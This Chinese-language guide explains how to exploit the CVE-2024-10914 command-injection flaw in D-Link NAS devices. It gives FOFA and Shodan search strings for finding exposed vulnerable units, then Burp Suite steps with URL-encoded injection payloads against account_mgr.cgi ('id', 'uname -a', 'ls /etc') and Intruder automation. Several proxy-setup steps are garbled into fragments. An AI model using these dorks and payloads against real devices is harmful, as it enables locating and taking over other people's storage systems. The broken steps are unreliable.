使用以下搜索 Dork 查找可能易受攻击的 D-Link NAS 设备:
FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"
SHODAN:
"http.title:D-Link" product:"lighttpd"
此搜索字符串有助于识别运行受影响版本 Lighttpd 服务器的易受攻击 D-Link DNS ShareCenter 设备。
本指南提供了如何使用 Burp Suite 手动测试 D-Link NAS 中 name 参数的命令注入漏洞(CVE-2024-10914)的逐步说明。目标 URL:http://Target。
127.0.0.1:8080)的 Web 浏览器127.0.0.1,端口 8080。http://Target。定位易受攻击的参数:在拦截到的请求中,找到 URL 中的 name 参数。它应该如下所示:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
注入测试命令:将 name 参数修改为包含测试命令,例如 echo "test":
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
发送修改后的请求:将修改后的请求转发到服务器。
检查响应:在响应中查找注入命令的输出。例如,如果服务器执行了 echo "test",你应该看到:
test
注入恶意命令:如果测试成功,尝试更复杂的命令,例如:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
发送利用请求:将此请求转发到服务器。
分析响应:检查响应中是否存在命令的输出(例如用户 ID 信息)。
使用 Intruder:使用 Burp Suite 的 Intruder 工具自动化测试。
name 参数设置为 Payload 位置。示例 Payload:
echo "test"
id
uname -a
ls /etc
启动 Intruder:运行 Intruder 攻击以自动测试多个 Payload。